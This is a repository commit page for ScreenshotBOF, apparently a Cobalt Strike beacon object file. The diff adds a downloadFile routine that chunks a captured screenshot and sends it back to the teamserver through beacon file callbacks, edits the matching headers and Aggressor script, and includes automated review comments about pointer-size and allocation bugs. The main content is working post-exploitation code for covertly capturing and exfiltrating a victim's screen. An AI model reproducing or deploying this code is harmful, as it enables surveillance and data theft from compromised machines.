Projects STRLCPY ScreenshotBOF Commits d082e142
🤬
  • ■ ■ ■ ■ ■ ■
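--- a/ScreenshotBOF/Source.cpp
+++ b/ScreenshotBOF/Source.cpp
@@ -5,7 +5,138 @@
 #pragma comment(lib, "User32.lib")
 #pragma comment(lib, "Gdi32.lib")
 
+char downloadfilename[] = "screenshot.bmp";
+/*Download File*/
+void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) {
 
+ //Intializes random number generator to create fileId
+ time_t t;
+ MSVCRT$srand((unsigned)MSVCRT$time(&t));
+ int fileId = MSVCRT$rand();
+
+ //8 bytes for fileId and fileSize
+ int messageLength = downloadFileNameLength + 8;
+ char* packedData = (char*)MSVCRT$malloc(messageLength);
+
+ //pack on fileId as 4-byte int first
+ packedData[0] = (fileId >> 24) & 0xFF;
+ packedData[1] = (fileId >> 16) & 0xFF;
+ packedData[2] = (fileId >> 8) & 0xFF;
+ packedData[3] = fileId & 0xFF;
+
+ //pack on fileSize as 4-byte int second
+ packedData[4] = (fileSize >> 24) & 0xFF;
+ packedData[5] = (fileSize >> 16) & 0xFF;
+ packedData[6] = (fileSize >> 8) & 0xFF;
+ packedData[7] = fileSize & 0xFF;
+
+ int packedIndex = 8;
+
+ //pack on the file name last
+ for (int i = 0; i < downloadFileNameLength; i++) {
+ packedData[packedIndex] = fileName[i];
+ packedIndex++;
+ }
+
+ BeaconOutput(CALLBACK_FILE, packedData, messageLength);
+
+ if (fileSize > (1024 * 900)) {
+
+ //Lets see how many times this constant goes into our file size, then add one (because if it doesn't go in at all, we still have one chunk)
+ int numOfChunks = (fileSize / (1024 * 900)) + 1;
+ int index = 0;
+ int chunkSize = 1024 * 900;
+
+ while (index < fileSize) {
+ if (fileSize - index > chunkSize) {//We have plenty of room, grab the chunk and move on
+
+ /*First 4 are the fileId
+ then account for length of file
+ then a byte for the good-measure null byte to be included
+ then lastly is the 4-byte int of the fileSize*/
+ int chunkLength = 4 + chunkSize;
+ char* packedChunk = (char*)MSVCRT$malloc(chunkLength);
+
+ //pack on fileId as 4-byte int first
+ packedChunk[0] = (fileId >> 24) & 0xFF;
+ packedChunk[1] = (fileId >> 16) & 0xFF;
+ packedChunk[2] = (fileId >> 8) & 0xFF;
+ packedChunk[3] = fileId & 0xFF;
+
+ int chunkIndex = 4;
+
+ //pack on the file name last
+ for (int i = index; i < index + chunkSize; i++) {
+ packedChunk[chunkIndex] = returnData[i];
+ chunkIndex++;
+ }
+
+ BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength);
+
+ }
+ else {//This chunk is smaller than the chunkSize, so we have to be careful with our measurements
+
+ int lastChunkLength = fileSize - index + 4;
+ char* lastChunk = (char*)MSVCRT$malloc(lastChunkLength);
+
+ //pack on fileId as 4-byte int first
+ lastChunk[0] = (fileId >> 24) & 0xFF;
+ lastChunk[1] = (fileId >> 16) & 0xFF;
+ lastChunk[2] = (fileId >> 8) & 0xFF;
+ lastChunk[3] = fileId & 0xFF;
+ int lastChunkIndex = 4;
+
+ //pack on the file name last
+ for (int i = index; i < fileSize; i++) {
+ lastChunk[lastChunkIndex] = returnData[i];
+ lastChunkIndex++;
+ }
+ BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength);
+ }
+
+ index = index + chunkSize;
+
+ }
+
+ }
+ else {
+
+ /*first 4 are the fileId
+ then account for length of file
+ then a byte for the good-measure null byte to be included
+ then lastly is the 4-byte int of the fileSize*/
+ int chunkLength = 4 + fileSize;
+ char* packedChunk = (char*)MSVCRT$malloc(chunkLength);
+
+ //pack on fileId as 4-byte int first
+ packedChunk[0] = (fileId >> 24) & 0xFF;
+ packedChunk[1] = (fileId >> 16) & 0xFF;
+ packedChunk[2] = (fileId >> 8) & 0xFF;
+ packedChunk[3] = fileId & 0xFF;
+ int chunkIndex = 4;
+
+ //pack on the file name last
+ for (int i = 0; i < fileSize; i++) {
+ packedChunk[chunkIndex] = returnData[i];
+ chunkIndex++;
+ }
+
+ BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength);
+ }
+
+
+ //We need to tell the teamserver that we are done writing to this fileId
+ char packedClose[4];
+
+ //pack on fileId as 4-byte int first
+ packedClose[0] = (fileId >> 24) & 0xFF;
+ packedClose[1] = (fileId >> 16) & 0xFF;
+ packedClose[2] = (fileId >> 8) & 0xFF;
+ packedClose[3] = fileId & 0xFF;
+ BeaconOutput(CALLBACK_FILE_CLOSE, packedClose, 4);
+
+ return;
+}
 
 #pragma region error_handling
 #define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
@@ -80,11 +211,10 @@
  ReleaseDC(NULL, hDC);
  }
 
- fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
- FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
+ //fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
 
- if (fh == INVALID_HANDLE_VALUE)
- return FALSE;
+ //if (fh == INVALID_HANDLE_VALUE)
+ // return FALSE;
 
  bmfHdr.bfType = 0x4D42; // "BM"
  dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize;
@@ -92,19 +222,28 @@
  bmfHdr.bfReserved1 = 0;
  bmfHdr.bfReserved2 = 0;
  bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize;
+ void* bmpdata = malloc(sizeof(BITMAPFILEHEADER) + dwDIBSize);
+ memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER));
+ memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize);
 
- WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL);
 
- WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL);
+ downloadFile((char*)lpszFileName, sizeof(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize));
+ //WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL);
+
+ /* clean up */
  GlobalUnlock(hDib);
  GlobalFree(hDib);
- CloseHandle(fh);
+ //CloseHandle(fh);
  return TRUE;
 }
 
 #ifdef BOF
 void go(char* buff, int len) {
- BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk");
+ datap parser;
+ char * downloadfilename;
+ BeaconDataParse(&parser, buff, len);
+ downloadfilename = BeaconDataExtract(&parser, NULL);
+ BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to %s",downloadfilename);
  int x1, y1, x2, y2, w, h;
  // get screen dimensions
  x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
@@ -132,10 +271,10 @@
  */
 
  BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap...");
- LPCSTR filename = "screenshot.bmp";
+ LPCSTR filename = (LPCSTR)downloadfilename;
  SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename);
 
- BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp");
+ //BeaconPrintf(0x0, "[+] Printscreen bitmap saved to %s",downloadfilename);
  // clean up
  SelectObject(hDC, old_obj);
  DeleteDC(hDC);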
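Review bot: `downloadFile((char*)lpszFileName, sizeof(lpszFileName), ...)` passes the size of a pointer, not the length of the name, if `lpszFileName` is the `LPCTSTR` parameter that `go()` supplies (the signature of `SaveHBITMAPToFile` lies outside the visible hunks). The name loop in `downloadFile` therefore copies 4 or 8 bytes whatever the string holds, cutting longer names short and reading past the end of shorter ones; pass the real length instead, for instance the one `BeaconDataExtract` can report through its second argument, which `go()` currently gives as `NULL`. None of the `MSVCRT$malloc` results (`packedData`, `packedChunk`, `lastChunk`) nor `bmpdata` is checked or released, so a failed allocation is written through at once and every run leaves a copy of the whole bitmap plus one buffer per chunk in the host process. A guard such as `if (!packedData) return;` after each allocation and a release once `BeaconOutput` has returned (assuming it copies the buffer) would fix that; the release needs a free import declared next to the new `MSVCRT$malloc` one. The comment `//pack on the file name last` above the three data-copy loops is also stale, since those loops copy file data.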
  • ■ ■ ■ ■ ■ ■
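--- a/ScreenshotBOF/beacon.h
+++ b/ScreenshotBOF/beacon.h
@@ -44,6 +44,9 @@
 #define CALLBACK_OUTPUT_OEM 0x1e
 #define CALLBACK_ERROR 0x0d
 #define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_FILE 0x02
+#define CALLBACK_FILE_WRITE 0x08
+#define CALLBACK_FILE_CLOSE 0x09
 
 DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...);
 DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len);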
  • ■ ■ ■ ■ ■ ■
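--- a/ScreenshotBOF/bofdefs.h
+++ b/ScreenshotBOF/bofdefs.h
@@ -163,6 +163,7 @@
 DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
 DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes);
 DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t);
+DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t);
 DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t);
 
 
@@ -266,6 +267,7 @@
 #define HeapAlloc KERNEL32$HeapAlloc
 #define HeapReAlloc KERNEL32$HeapReAlloc
 #define memcpy MSVCRT$memcpy
+#define malloc MSVCRT$malloc
 #define memset MSVCRT$memset
 
 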
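Review bot: The added `#define malloc MSVCRT$malloc` at new line 270 redefines a macro this header already defines: the build log changed in the same commit reports `warning C4005: 'malloc': macro redefinition` with the previous definition at bofdefs.h line 245. That earlier definition is not shown, so from line 270 on `malloc` may resolve to a different allocator than the one the header's existing release macro expects, and `bmpdata` in Source.cpp is allocated through this macro. Replace the line-245 definition rather than shadowing it, or drop the new macro and call `MSVCRT$malloc` by name as `downloadFile` already does.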
  • ■ ■ ■ ■ ■
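--- a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log
+++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log
@@ -13,8 +13,10 @@
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
-C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
+C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
  C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
+C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
+ C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
  C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj
  1 File(s) copied
  enumerating sections...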
  • ScreenshotBOF/intermediary/BOF/x64/source.obj
    Binary file.
  • ■ ■ ■ ■ ■
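--- a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log
+++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log
@@ -13,8 +13,10 @@
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
-C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
+C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
  C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
+C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
+ C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
  C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj
  1 File(s) copied
  enumerating sections...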
  • ScreenshotBOF/intermediary/BOF/x86/source.obj
    Binary file.
  • bin/BOF/ScreenshotBOF.x64.obj
    Binary file.
  • bin/BOF/ScreenshotBOF.x86.obj
    Binary file.
  • ■ ■ ■ ■ ■
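--- a/bin/BOF/screenshotBOF.cna
+++ b/bin/BOF/screenshotBOF.cna
@@ -11,11 +11,15 @@
  # figure out the arch of this session
  $barch = barch($1);
  # read in the right BOF file
- $handle = openf(script_resource("screenshotBOF. $+ $barch $+ .obj"));
+ $handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj"));
  $data = readb($handle, -1);
  closef($handle);
+
+ $args = bof_pack($1, "z",$2);
+
  # announce what we're doing
  btask($1, "Running screenshot BOF by (@codex_tf2)");
  # execute it.
  beacon_inline_execute($1, $data, "go", $args);
 }
+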
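Review bot: `bof_pack($1, "z",$2)` packs the alias's second argument without checking that one was supplied, so invoking the alias with no file name appears to hand `go()` an empty or missing string, which it passes to `BeaconDataExtract` and prints with `%s` unchecked. A guard before the pack, along the lines of `if ($2 eq "") { berror($1, "file name required"); return; }`, keeps that failure in the script instead of in the loaded object. The alias definition begins above the visible lines, so its name and any existing usage text cannot be seen from here.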
  • bin/screenshotBOF.zip
    Binary file.